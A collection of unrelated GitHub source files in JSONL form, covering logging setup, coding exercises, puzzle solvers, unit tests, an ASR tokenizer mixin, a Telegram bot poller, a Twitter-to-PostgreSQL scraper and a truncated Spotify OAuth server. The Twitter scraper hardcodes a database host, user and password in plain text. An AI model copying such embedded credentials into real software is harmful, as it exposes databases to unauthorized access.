+{"seq_id":"17919089233","text":"import logging\nimport logging.handlers\n\nlog_formatter = logging.Formatter('%(asctime)s %(levelname)s %(module)s %(message)s')\n\nlog_file_handler = logging.handlers.RotatingFileHandler('pokemon.log', maxBytes=1024*1024, backupCount=10)\nlog_file_handler.setLevel(logging.INFO)\nlog_file_handler.setFormatter(log_formatter)\n\nlog_console_handler = logging.StreamHandler()\nlog_console_handler.setLevel(logging.INFO)\nlog_console_handler.setFormatter(log_formatter)\n\n\ndef configure_logger(name):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n logger.addHandler(log_file_handler)\n logger.addHandler(log_console_handler)\n return logger\n","repo_name":"hflabs/pokemon","sub_path":"server/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"48"} +{"seq_id":"30112821493","text":"def spy_game(nums):\n code = [0,0,7]\n pointer = 0\n for num in nums:\n if pointer == 3:\n return True\n if num == code[pointer] and pointer < 3:\n pointer += 1\n return pointer > 2\n\n# Check\nprint(spy_game([1,2,4,0,0,7,5]))\nprint(spy_game([1,0,2,4,0,5,7]))\nprint(spy_game([1,7,2,0,4,5,0]))\n\n\ndef count_primes(num):\n list_primes = [2]\n count = 3\n while count <= num:\n for i in list_primes:\n if count % i == 0:\n count += 2\n break\n else:\n list_primes.append(count)\n count += 2\n print(list_primes)\n return len(list_primes)\n\n\n# Check\nprint(count_primes(100))","repo_name":"JAntonioMarin/PythonBootcamp","sub_path":"Section6/48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42698535191","text":"import functools\nimport asyncio as aio\nimport typer\nimport traceback\n\ndef blocking_run(f):\n\t@functools.wraps(f)\n\tdef block_fn(*args, **kwargs):\n\t\taio.run(f(*args, **kwargs))\n\treturn block_fn\n\ndef catch_error(f):\n\t@functools.wraps(f)\n\tdef smooth(*args, **kwargs):\n\t\ttry:\n\t\t\tf(*args, **kwargs)\n\t\texcept Exception as e:\n\t\t\ttyper.secho(f\"Failure: {e}\", fg=typer.colors.RED, err=True)\n\t\t\tshow_tb = typer.prompt(f\"See full traceback? ([y, yes]/[n, any])\", default=\"n\").lower() in [\"y\", \"yes\"]\n\t\t\tif show_tb:\n\t\t\t\ttraceback.print_exc()\n\t\t\telse:\n\t\t\t\traise typer.Abort()\n\treturn smooth\n\n\n","repo_name":"ankitsainidev/nkit","sub_path":"nkit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14883260146","text":"import re\n\nfrom tqdm import tqdm\n\nINPUT_TXT = \"input.txt\"\n# INPUT_TXT = \"input-small.txt\"\n\n\nVAR_NAMES = set(\"wxyz\")\n\n\ndef solve_part1(lines):\n # move imp lines to the bottom\n index = 0\n while True:\n line = lines[index]\n if line == \"inp w\":\n next_line = lines[index + 1]\n if \"w\" not in next_line.split(\" \", 1)[1]:\n lines[index + 1] = line\n lines[index] = next_line\n index += 1\n if index == len(lines):\n break\n\n # merge mul 0 and add\n index = 0\n while True:\n line = lines[index]\n m = re.match(\"mul (.) 0\", line)\n if m:\n variable_name = m.group(1)\n next_line = lines[index + 1]\n mm = re.match(f\"add {variable_name} (.*)\", next_line)\n if mm:\n addition = mm.group(1)\n lines[index + 1] = f\"set {variable_name} {addition}\"\n del lines[index]\n\n index += 1\n if index == len(lines) - 1:\n break\n\n # merge eql eql\n index = 0\n while True:\n line = lines[index]\n if line == \"eql x w\" and lines[index + 1] == \"eql x 0\":\n lines[index + 1] = \"neql x w\"\n del lines[index]\n index += 1\n if index == len(lines) - 1:\n break\n #\n # # drop add 0\n # lines = list(filter(lambda x: not re.match(\"add . 0$\", x), lines))\n\n # drop div 1\n lines = list(filter(lambda x: not re.match(\"div . 1$\", x), lines))\n\n with open(\"new-input.txt\", \"w\") as out:\n for line in lines:\n out.write(line + \"\\n\")\n\n # block by input reads\n indices = []\n for i, line in enumerate(lines):\n if line == \"inp w\":\n indices.append(i)\n indices.append(len(lines))\n blocks = []\n for i, j in zip(indices, indices[1:]):\n blocks.append(lines[i + 1 : j])\n pre_input_block = lines[: indices[0]]\n\n # pre-input\n state = {v: 0 for v in VAR_NAMES}\n apply_steps(state, pre_input_block)\n print(\"pre input state:\", sorted(state))\n\n ranges = find_ranges(blocks)\n print(ranges)\n output = check(state, blocks, 0, ranges)\n print(output)\n\n\ndef check(start_state, blocks, block_index, ranges):\n if not blocks:\n return start_state[\"z\"] == 0\n\n vals = range(9, 0, -1)\n if len(blocks) > 10:\n vals = tqdm(vals, desc=str(len(blocks)) + \" \" * (14 - len(blocks)))\n for inp in vals:\n state = {**start_state, \"w\": inp}\n apply_steps(state, blocks[0])\n\n if block_index + 1 in ranges and state[\"z\"] % 26 not in ranges[block_index + 1]:\n continue\n\n ch = check(state, blocks[1:], block_index + 1, ranges)\n if ch:\n return inp + ch\n\n\ndef apply_steps(state, block):\n for step in block:\n make_step(state, step)\n\n\ndef make_step(state, step):\n spl = step.split(\" \")\n command = spl[0]\n target = spl[1]\n if command == \"add\":\n state[target] += other(spl, state)\n elif command == \"mul\":\n state[target] *= other(spl, state)\n elif command == \"div\":\n state[target] //= other(spl, state)\n elif command == \"mod\":\n state[target] %= other(spl, state)\n elif command == \"eql\":\n state[target] = 1 if state[target] == other(spl, state) else 0\n elif command == \"neql\":\n state[target] = 1 if state[target] != other(spl, state) else 0\n elif command == \"set\":\n state[target] = other(spl, state)\n else:\n raise Exception(\"Unknown command \", command)\n\n\ndef other(spl, values):\n other = spl[2]\n return values[other] if other in VAR_NAMES else int(other)\n\n\ndef find_ranges(blocks):\n ranges = {}\n for i, block in enumerate(blocks):\n for line in block:\n m = re.match(\"add x ([^z]+)\", line)\n if m:\n num = int(m.group(1))\n if num <= 9:\n r1 = 1 - num\n r2 = 9 - num\n ranges[i] = range(min(r1, r2), max(r1, r2) + 1)\n return ranges\n\n\ndef main():\n with open(INPUT_TXT) as f:\n lines = [line.strip() for line in f.readlines()]\n print(f\"{len(lines)} read\")\n\n result_part1 = solve_part1(lines)\n result_part2 = 0\n\n # TODO:\n # - drop DIV x 1\n # - drop ADD x 0\n # - merge eql, eql into nql\n # - merge mul x 0, add x y -> set x y\n\n print()\n print(\"##########\")\n print(f\"Result part 1: {result_part1}\")\n print(f\"Result part 2: {result_part2}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mkopec87/advent_of_code","sub_path":"src/2021/day24/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4670508285","text":"import unittest\nimport os\nfrom sqltxt.table import Table \nfrom sqltxt.column import Column, ColumnName, AmbiguousColumnNameError\nfrom sqltxt.expression import Expression\n\nclass TableTest(unittest.TestCase):\n\n def setUp(self):\n\n self.data_path = os.path.join(os.path.dirname(__file__), '../data')\n\n table_header = [\"col_a\", \"col_b\"]\n table_contents = \"\"\"1,1\n2,3\n3,2\"\"\"\n\n self.table_a = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"{0}\"'.format(table_contents), \n columns = table_header\n )\n\n table_header = [\"col_a\", \"col_b\"]\n table_contents = \"\"\"1,w\n2,x\n2,y\n5,z\"\"\"\n\n self.table_b = Table.from_cmd(\n name = 'table_b', \n cmd = 'echo -e \"{0}\"'.format(table_contents), \n columns = table_header\n )\n\n def test_subset_rows(self):\n \n conditions = [\n [Expression('col_b', '==', '1'), 'or', Expression('col_a', '==', '2')]\n ]\n self.table_a.subset_rows(conditions)\n \n cmds_actual = self.table_a.cmds\n cmds_expected = [\n 'echo -e \"1,1\\n2,3\\n3,2\"',\n \"awk -F',' 'OFS=\\\",\\\" { if (($2 == 1 || $1 == 2)) { print $1,$2 } }'\"]\n self.assertEqual(cmds_actual, cmds_expected)\n\n def test_order_columns(self):\n\n col_name_order = [ColumnName('col_b'), ColumnName('col_a')]\n self.table_a.order_columns(col_name_order)\n \n cmds_actual = self.table_a.cmds\n cmds_expected = ['echo -e \"1,1\\n2,3\\n3,2\"', \"awk -F',' 'OFS=\\\",\\\" { print $2,$1 }'\"]\n self.assertEqual(cmds_actual, cmds_expected)\n\n def test_sort(self):\n \n sort_by_col_names = [ColumnName('col_a'), ColumnName('col_b')]\n self.table_a.sort(sort_by_col_names)\n\n cmds_actual = self.table_a.cmds\n cmds_expected = ['echo -e \"1,1\\n2,3\\n3,2\"', \"sort -t, -k 1,1 -k 2,2\"]\n self.assertEqual(cmds_actual, cmds_expected)\n\n sort_by_cols = [self.table_a.get_column_for_name(cn) for cn in sort_by_col_names]\n self.assertEqual(self.table_a.sorted_by, sort_by_cols)\n\n def test_is_sorted_by(self):\n\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = ['col_a', 'col_b'])\n\n table_from_cmd.sorted_by = [Column('table_a.col_a'), Column('table_a.col_b')]\n\n self.assertTrue(table_from_cmd.is_sorted_by([0]))\n self.assertFalse(table_from_cmd.is_sorted_by([1]))\n self.assertTrue(table_from_cmd.is_sorted_by([0,1]))\n\n def test_get_column_for_name_raises_on_ambiguity(self):\n\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = ['col_a', 'col_a'])\n\n with self.assertRaisesRegexp(AmbiguousColumnNameError, 'Ambiguous column reference'):\n table_from_cmd.get_column_for_name(ColumnName('col_a'))\n\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = ['ta.col_a', 'tb.col_a'])\n\n with self.assertRaisesRegexp(AmbiguousColumnNameError, 'Ambiguous column reference'):\n table_from_cmd.get_column_for_name(ColumnName('col_a'))\n\n first_column = Column('ta.col_a')\n first_column.add_name('col_alpha')\n second_column = Column('tb.col_a')\n table_from_cmd = Table.from_cmd(\n name = 'table_a', \n cmd = 'echo -e \"\"',\n columns = [first_column, second_column])\n\n with self.assertRaisesRegexp(AmbiguousColumnNameError, 'Ambiguous column reference'):\n table_from_cmd.get_column_for_name(ColumnName('col_a'))\n\n def test_sample_rows(self):\n self.table_a.sample_rows(1)\n cmds_actual = self.table_a.cmds\n cmds_expected = ['echo -e \"1,1\\n2,3\\n3,2\"',\n \"\"\"awk -v seed=$RANDOM -v n={0} '\n BEGIN {{ srand(seed) }}\n NR <= n {{ reservoir[NR] = $0 }}\n NR > n {{ M = int(rand() * NR) + 1; if (M <= n) {{ reservoir[M] = $0 }}}}\n END {{ for (key in reservoir) {{ print reservoir[key] }}}}'\"\"\".format(1)\n ]\n self.assertEqual(cmds_actual, cmds_expected)\n\n def test_get_cmd_str(self):\n\n table_from_file = Table.from_file_path(os.path.join(self.data_path, 'table_a.txt'))\n\n # output from a file-backed Table to STDOUT\n cmd_actual = table_from_file.get_cmd_str()\n cmd_expected = 'tail -n+2 {}/table_a.txt'.format(self.data_path)\n self.assertEqual(cmd_actual, cmd_expected)\n\n table_from_cmd = Table.from_cmd(\n 'table_a', \n cmd = 'echo -e \"1,2,3,4\"', \n columns = ['col_a', 'col_b', 'col_c', 'col_d'])\n\n # output from a command-backed Table to STDOUT\n cmd_actual = table_from_cmd.get_cmd_str()\n cmd_expected = 'echo -e \"1,2,3,4\"'\n self.assertEqual(cmd_actual, cmd_expected)\n\n # add a command, then output\n table_from_cmd.cmds += ['sort']\n\n # to STDOUT\n cmd_actual = table_from_cmd.get_cmd_str()\n cmd_expected = 'echo -e \"1,2,3,4\" | sort'\n self.assertEqual(cmd_actual, cmd_expected)\n","repo_name":"shahin/sqltxt","sub_path":"tests/unit/table_test.py","file_name":"table_test.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29764458504","text":"import os\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\nfrom omegaconf import DictConfig, OmegaConf, open_dict\n\nfrom nemo.collections.asr.parts.utils import asr_module_utils\nfrom nemo.collections.common import tokenizers\nfrom nemo.utils import logging\n\n\nclass ASRBPEMixin(ABC):\n \"\"\" ASR BPE Mixin class that sets up a Tokenizer via a config\n\n This mixin class adds the method `_setup_tokenizer(...)`, which can be used by ASR models\n which depend on subword tokenization.\n\n The setup_tokenizer method adds the following parameters to the class -\n - tokenizer_cfg: The resolved config supplied to the tokenizer (with `dir` and `type` arguments).\n - tokenizer_dir: The directory path to the tokenizer vocabulary + additional metadata.\n - tokenizer_type: The type of the tokenizer. Currently supports `bpe` and `wpe`.\n - vocab_path: Resolved path to the vocabulary text file.\n\n In addition to these variables, the method will also instantiate and preserve a tokenizer\n (subclass of TokenizerSpec) if successful, and assign it to self.tokenizer.\n \"\"\"\n\n def _setup_tokenizer(self, tokenizer_cfg: DictConfig):\n # Prevent tokenizer parallelism (unless user has explicitly set it)\n if 'TOKENIZERS_PARALLELISM' not in os.environ:\n os.environ['TOKENIZERS_PARALLELISM'] = 'false'\n\n self.tokenizer_cfg = OmegaConf.to_container(tokenizer_cfg, resolve=True) # type: dict\n self.tokenizer_dir = self.tokenizer_cfg.pop('dir') # Remove tokenizer directory\n self.tokenizer_type = self.tokenizer_cfg.pop('type').lower() # Remove tokenizer_type\n\n self.hf_tokenizer_kwargs = self.tokenizer_cfg.pop(\"hf_kwargs\", {}) # Remove HF tokenizer kwargs\n\n # Preserve config\n if hasattr(self, 'cfg') and 'tokenizer' in self.cfg:\n self.cfg.tokenizer.dir = self.tokenizer_dir\n self.cfg.tokenizer.type = self.tokenizer_type\n\n if 'hf_kwargs' in tokenizer_cfg:\n with open_dict(self.cfg.tokenizer):\n self.cfg.tokenizer.hf_kwargs = tokenizer_cfg.get('hf_kwargs')\n\n if self.tokenizer_type not in ['bpe', 'wpe']:\n raise ValueError(\n \"`tokenizer.type` must be either `bpe` for SentencePiece tokenizer or \"\n \"`wpe` for BERT based tokenizer\"\n )\n\n if self.tokenizer_type == 'bpe':\n # This is a BPE Tokenizer\n if 'model_path' in self.tokenizer_cfg:\n model_path = self.tokenizer_cfg.get('model_path')\n else:\n model_path = os.path.join(self.tokenizer_dir, 'tokenizer.model')\n model_path = self.register_artifact('tokenizer.model_path', model_path)\n self.model_path = model_path\n\n if 'special_tokens' in self.tokenizer_cfg:\n special_tokens = self.tokenizer_cfg['special_tokens']\n\n if special_tokens is not None:\n raise ValueError(\"`special_tokens` are no longer supported for SentencePiece based tokenizers.\")\n\n # Update special tokens\n self.tokenizer = tokenizers.SentencePieceTokenizer(model_path=model_path)\n\n if 'vocab_path' in self.tokenizer_cfg:\n vocab_path = self.tokenizer_cfg.get('vocab_path')\n else:\n vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')\n vocab_path = self.register_artifact('tokenizer.vocab_path', vocab_path)\n self.vocab_path = vocab_path\n\n try:\n if 'spe_tokenizer_vocab' in self.tokenizer_cfg:\n spe_vocab_path = self.tokenizer_cfg.get('spe_tokenizer_vocab')\n else:\n spe_vocab_path = os.path.join(self.tokenizer_dir, 'tokenizer.vocab')\n spe_vocab_path = self.register_artifact('tokenizer.spe_tokenizer_vocab', spe_vocab_path)\n self.spe_vocab_path = spe_vocab_path\n except FileNotFoundError:\n # fallback case for older checkpoints that did not preserve the tokenizer.vocab\n self.spe_vocab_path = None\n\n vocabulary = {}\n for i in range(self.tokenizer.vocab_size):\n piece = self.tokenizer.ids_to_tokens([i])\n piece = piece[0]\n vocabulary[piece] = i + 1\n\n # wrapper method to get vocabulary conveniently\n def get_vocab():\n return vocabulary\n\n # attach utility values to the tokenizer wrapper\n self.tokenizer.tokenizer.vocab_size = len(vocabulary)\n self.tokenizer.tokenizer.get_vocab = get_vocab\n self.tokenizer.tokenizer.all_special_tokens = self.tokenizer.special_token_to_id\n\n else:\n # This is a WPE Tokenizer\n # If path from previous registration exists, remove it\n if 'vocab_path' in self.tokenizer_cfg:\n vocab_path = self.tokenizer_cfg.get('vocab_path')\n else:\n vocab_path = os.path.join(self.tokenizer_dir, 'vocab.txt')\n vocab_path = self.register_artifact('tokenizer.vocab_path', vocab_path)\n self.vocab_path = vocab_path\n\n # If path from previous registration exists, remove it\n if 'vocab_path' in self.tokenizer_cfg:\n self.tokenizer_cfg.pop('vocab_path')\n\n self.tokenizer = tokenizers.AutoTokenizer(\n pretrained_model_name='bert-base-cased',\n vocab_file=self.vocab_path,\n mask_token=self.hf_tokenizer_kwargs.get('mask_token', None),\n bos_token=self.hf_tokenizer_kwargs.get('bos_token', None),\n eos_token=self.hf_tokenizer_kwargs.get('eos_token', None),\n pad_token=self.hf_tokenizer_kwargs.get('pad_token', None),\n sep_token=self.hf_tokenizer_kwargs.get('sep_token', None),\n cls_token=self.hf_tokenizer_kwargs.get('cls_token', None),\n unk_token=self.hf_tokenizer_kwargs.get('unk_token', None),\n use_fast=self.hf_tokenizer_kwargs.get('use_fast', False),\n )\n\n logging.info(\n \"Tokenizer {} initialized with {} tokens\".format(\n self.tokenizer.__class__.__name__, self.tokenizer.vocab_size\n )\n )\n\n\nclass ASRModuleMixin(ABC):\n \"\"\"\n ASRModuleMixin is a mixin class added to ASR models in order to add methods that are specific\n to a particular instantiation of a module inside of an ASRModel.\n\n Each method should first check that the module is present within the subclass, and support additional\n functionality if the corresponding module is present.\n \"\"\"\n\n def change_conv_asr_se_context_window(self, context_window: int, update_config: bool = True):\n \"\"\"\n Update the context window of the SqueezeExcitation module if the provided model contains an\n `encoder` which is an instance of `ConvASREncoder`.\n\n Args:\n context_window: An integer representing the number of input timeframes that will be used\n to compute the context. Each timeframe corresponds to a single window stride of the\n STFT features.\n\n Say the window_stride = 0.01s, then a context window of 128 represents 128 * 0.01 s\n of context to compute the Squeeze step.\n update_config: Whether to update the config or not with the new context window.\n \"\"\"\n asr_module_utils.change_conv_asr_se_context_window(\n self, context_window=context_window, update_config=update_config\n )\n\n\nclass DiarizationMixin(ABC):\n @abstractmethod\n def diarize(self, paths2audio_files: List[str], batch_size: int = 1) -> List[str]:\n \"\"\"\n Takes paths to audio files and returns speaker labels\n Args:\n paths2audio_files: paths to audio fragment to be transcribed\n\n Returns:\n Speaker labels\n \"\"\"\n pass\n","repo_name":"Xianchao-Wu/nemo_bidecoder","sub_path":"collections/asr/parts/mixins/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"45082372836","text":"import asyncio\nfrom .methods import *\nfrom db.db import DB\nfrom .message_handler import message_handler\nfrom .callback_handler import callback_handler\n\nasync def check_updates(token, update):\n if \"message\" in update:\n await message_handler(token, update)\n elif \"callback_query\":\n await callback_handler(token, update)\n else:\n pass\n\n\nasync def run(token):\n try:\n update_id = (await get_updates(token))[-1]['update_id']\n except:\n update_id = 0\n \n try:\n bot_username = (await get_me(token))['username']\n except KeyError:\n return\n \n while True:\n try:\n if DB().get_user_bot(bot_username) is None:\n return\n \n updates = await get_updates(token, update_id)\n for update in updates:\n if update_id < update['update_id']:\n update_id = update['update_id']\n await check_updates(token, update)\n \n \n await asyncio.sleep(2)\n except:\n await asyncio.sleep(10)\n","repo_name":"olegtititele/tg_onlyfans","sub_path":"handlers/tg_user_bot/userbot.py","file_name":"userbot.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31383884234","text":"\"\"\"\r\nPrime summations\r\nProblem 77\r\n\r\nIt is possible to write ten as the sum of primes in exactly five different ways:\r\n\r\n7 + 3\r\n5 + 5\r\n5 + 3 + 2\r\n3 + 3 + 2 + 2\r\n2 + 2 + 2 + 2 + 2\r\n\r\nWhat is the first value which can be written as the sum of primes in over five thousand different ways?\r\n\r\nLink: https://projecteuler.net/problem=77\r\n\r\nDate solved:\r\n09/10/2022 \r\n\"\"\"\r\n\r\n\r\nANSWER = 71\r\n\r\n# imports\r\n\r\nfrom functools import lru_cache\r\n\r\nfrom maths.sequences.special_sequences import PrimesSeq\r\n\r\n# solution\r\n\r\n\r\nprimes = PrimesSeq().seq\r\n\r\n\r\n@lru_cache(100)\r\ndef H(n, a):\r\n if a == n:\r\n return 1\r\n if a == 1:\r\n return not n % 2\r\n if a > n:\r\n return 0\r\n\r\n summation = 0\r\n i = 0\r\n p = primes[i]\r\n while p <= a and p <= n - a:\r\n summation += H(n - a, p)\r\n i += 1\r\n p = primes[i]\r\n\r\n return summation\r\n\r\n\r\ndef f(n):\r\n\r\n summation = 0\r\n i = 0\r\n p = primes[i]\r\n while p <= n:\r\n summation += H(n, p)\r\n i += 1\r\n p = primes[i]\r\n\r\n return summation\r\n\r\n\r\ndef solution():\r\n\r\n threshold = 5000\r\n\r\n n = 2\r\n while True:\r\n if f(n) > threshold:\r\n return n\r\n n += 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from time import perf_counter\r\n\r\n t0 = perf_counter()\r\n sol = solution()\r\n t1 = perf_counter()\r\n print(f\"solution = {sol} in {t1-t0: 0.4f} seconds\")\r\n print(\"answer =\", ANSWER)\r\n","repo_name":"lsabor/project_euler","sub_path":"000-100/70s/077_25_Prime_summations.py","file_name":"077_25_Prime_summations.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13732948750","text":"import requests\nimport json\nimport os\nimport errno\nimport re\n\n# Import links for CSV downloads\nwith open(\"./output/all_csv_links.json\") as f:\n data = json.load(f)\n\nfor i,csv_link in enumerate(data):\n # Extract all tournament ids from 'tournament_id=##' part of link\n matches = re.findall(\".*_id=([0-9]*)\", csv_link)\n tournament_id = matches[0]\n\n print(\"Downloading \" + str(tournament_id) + \" from \" + csv_link)\n print(str(i+1) + \" of \" + str(len(data)))\n\n # Create directory to file if needed\n filename = \"./tourney_csvs/\" + str(tournament_id) + \".csv\"\n if not os.path.exists(os.path.dirname(filename)):\n try:\n os.makedirs(os.path.dirname(filename))\n except OSError as exc:\n if exc.errno != errno.EEXIST:\n raise\n \n # Write to file\n r = requests.get(csv_link, allow_redirects=True)\n with open(filename, \"w\") as f:\n f.write(r.content)","repo_name":"colinfong/askfred_scraper","sub_path":"download_csvs.py","file_name":"download_csvs.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2668274035","text":"'''\n* Title: GraphicsDrawer source code\n* Author: Smith, J\n* Date: 2011\n* Code version: 2.0\n* Availability: http://www.graphicsdrawer.com\n'''\n\nimport time\nimport user\nimport tweepy\nimport psycopg2\n\nauth = tweepy.OAuthHandler(user.CONSUMER_KEY, user.CONSUMER_KEY_SECRET)\nauth.set_access_token(user.ACCESS_TOKEN, user.ACCESS_TOKEN_SECRET)\napi = tweepy.API(auth)\n\n\nclass MyStreamListener(tweepy.StreamListener):\n\n def __init__(self, time_limit=300):\n self.start_time = time.time()\n self.limit = time_limit\n super(MyStreamListener, self).__init__()\n\n def on_connect(self):\n print(\"Connected to Twitter API.\")\n\n def on_status(self, status):\n\n # Tweet ID\n tweet_id = status.id\n\n # User ID\n user_id = status.user.id\n # Username\n username = status.user.name\n\n # Tweet\n if status.truncated == True:\n tweet = status.extended_tweet['full_text']\n hashtags = status.extended_tweet['entities']['hashtags']\n else:\n tweet = status.text\n hashtags = status.entities['hashtags']\n\n # Read hastags\n hashtags = read_hashtags(hashtags)\n\n # Retweet count\n retweet_count = status.retweet_count\n # Language\n lang = status.lang\n\n # If tweet is not a retweet and tweet is in English\n if not hasattr(status, \"retweeted_status\") and lang == \"en\":\n # Connect to database\n dbConnect(user_id, username, tweet_id, tweet, retweet_count, hashtags)\n\n if (time.time() - self.start_time) > self.limit:\n print(time.time(), self.start_time, self.limit)\n return False\n\n def on_error(self, status_code):\n if status_code == 420:\n # Returning False in on_data disconnects the stream\n return False\n\n# Extract hashtags\ndef read_hashtags(tag_list):\n hashtags = []\n for tag in tag_list:\n hashtags.append(tag['text'])\n return hashtags\n\n# commands = (# Table 1\n# '''Create Table TwitterUser(User_Id BIGINT PRIMARY KEY, User_Name TEXT);''',\n# # Table 2\n# '''Create Table TwitterTweet(Tweet_Id BIGINT PRIMARY KEY,\n# User_Id BIGINT,\n# Tweet TEXT,\n# Retweet_Count INT,\n# CONSTRAINT fk_user\n# FOREIGN KEY(User_Id)\n# REFERENCES TwitterUser(User_Id));''',\n# # Table 3\n# '''Create Table TwitterEntity(Id SERIAL PRIMARY KEY,\n# Tweet_Id BIGINT,\n# Hashtag TEXT,\n# CONSTRAINT fk_user\n# FOREIGN KEY(Tweet_Id)\n# REFERENCES TwitterTweet(Tweet_Id));''')\n\n# Connection to database server\n# need to allow ip address on GCP first - remember to convert to CIDR format with \"to\" address\nconn = psycopg2.connect(host=\"34.86.177.25\", database=\"postgres\", user='postgres', password = 'COVID_type8eat')\n\n# Create cursor to execute SQL commands\ncur = conn.cursor()\n\n# Execute SQL commands\n# for command in commands:\n# # Create tables\n# cur.execute(command)\n\n# Close communication with server\nconn.commit()\ncur.close()\nconn.close()\n\n# Insert Tweet data into database\ndef dbConnect(user_id, user_name, tweet_id, tweet, retweet_count, hashtags):\n # need to allow ip address first - remember to convert to CIDR format with \"to\" address\n conn = psycopg2.connect(host=\"34.86.177.25\", database=\"postgres\", user= 'postgres', password = 'COVID_type8eat')\n\n cur = conn.cursor()\n\n # insert user information\n command = '''INSERT INTO TwitterUser (user_id, user_name) VALUES (%s,%s) ON CONFLICT\n (User_Id) DO NOTHING;'''\n cur.execute(command, (user_id, user_name))\n\n # insert tweet information\n command = '''INSERT INTO TwitterTweet (tweet_id, user_id, tweet, retweet_count) VALUES (%s,%s,%s,%s);'''\n cur.execute(command, (tweet_id, user_id, tweet, retweet_count))\n\n # insert entity information\n for i in range(len(hashtags)):\n hashtag = hashtags[i]\n command = '''INSERT INTO TwitterEntity (tweet_id, hashtag) VALUES (%s,%s);'''\n cur.execute(command, (tweet_id, hashtag))\n\n # Commit changes\n conn.commit()\n\n # Disconnect\n cur.close()\n conn.close()\n\nmyStreamListener = MyStreamListener()\nmyStream = tweepy.Stream(auth=api.auth, listener=myStreamListener,\n tweet_mode=\"extended\")\nmyStream.filter(track=['covid','coronavirus','pandemic','covid19','covid-19'])","repo_name":"shoang22/hackgt","sub_path":"db/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6669455287","text":"import requests\nimport base64\nimport random\nimport string\nimport urllib\nimport urllib.parse\nfrom http.server import BaseHTTPRequestHandler\nfrom dotenv import dotenv_values\n\nimport spotifyclient\n\nconfig = {\n **dotenv_values('.env'),\n **dotenv_values('.env.local'),\n}\nfrom oauthlib.oauth2 import WebApplicationClient\n\n\ndef random_name(n):\n return ''.join([random.choice(string.ascii_letters + string.digits) for _ in range(n)])\n\n\nclass CallbackServer(BaseHTTPRequestHandler):\n g_oauth_state = None\n g_access_token = None\n g_refresh_token = None\n\n spotify_client = None\n# primary_device_id = None\n\n VUE_APP_SPOTIFY_CLIENT_ID = config['VUE_APP_SPOTIFY_CLIENT_ID']\n VUE_APP_SPOTIFY_CLIENT_SECRET = config['VUE_APP_SPOTIFY_CLIENT_SECRET']\n\n def __init__(self, *args):\n print(f'CallbackServer::init start {args}')\n BaseHTTPRequestHandler.__init__(self, *args)\n print('CallbackServer::init finish')\n\n def callback_method(self, path, query, redirect_uri):\n print(f'path={path}, query = {query}')\n\n if path == '/callback':\n params = urllib.parse.parse_qs(query)\n print('CODE')\n print(params['code'][0])\n print('STATE')\n print(f'g_oauth_state = {self.g_oauth_state}')\n print(params['state'][0])\n print(self.g_oauth_state)\n if CallbackServer.g_oauth_state == params['state'][0]:\n print('OK!')\n data = {\n 'code': params['code'][0],\n 'redirect_uri': redirect_uri,\n 'grant_type': 'authorization_code'\n }\n encoded = base64.b64encode(\n f'{CallbackServer.VUE_APP_SPOTIFY_CLIENT_ID}:{CallbackServer.VUE_APP_SPOTIFY_CLIENT_SECRET}'.encode(\n 'utf-8')).decode(\"ascii\")\n print(encoded)\n print(redirect_uri)\n response = requests.post(\n 'https://accounts.spotify.com/api/token',\n data=data,\n headers={\n 'Authorization': f'Basic {encoded}'\n }\n )\n print(response)\n print(response.text)\n # print(response.json())\n res_data = response.json()\n CallbackServer.spotify_client = spotifyclient.SpotifyClient(\n access_token=res_data['access_token'],\n refresh_token=res_data['refresh_token']\n )\n CallbackServer.g_access_token = res_data['access_token']\n CallbackServer.g_refresh_token = res_data['refresh_token']\n return 'oauth OK!'\n else:\n return 'oauth NG!'\n\n return ['Hello', 'World!', 'with', query]\n\n def do_GET(self):\n parsed_path = urllib.parse.urlparse(self.path)\n print(self.headers['Host'])\n print(self.path)\n print(parsed_path)\n print(parsed_path.path)\n path = parsed_path.path\n query = parsed_path.query\n\n host = self.headers['Host']\n redirect_uri = f'http://{host}/callback'\n\n if query == 'oauth':\n scope = [\n 'user-library-read',\n 'user-modify-playback-state',\n 'user-read-email',\n 'user-read-playback-state',\n 'user-read-private',\n 'user-read-recently-played'\n ]\n state = random_name(16)\n CallbackServer.g_oauth_state = state\n print(f'g_oauth_state = {CallbackServer.g_oauth_state}')\n oauth = WebApplicationClient(CallbackServer.VUE_APP_SPOTIFY_CLIENT_ID)\n url, headers, body = oauth.prepare_authorization_request('https://accounts.spotify.com/authorize',\n redirect_url=redirect_uri,\n scope=scope,\n 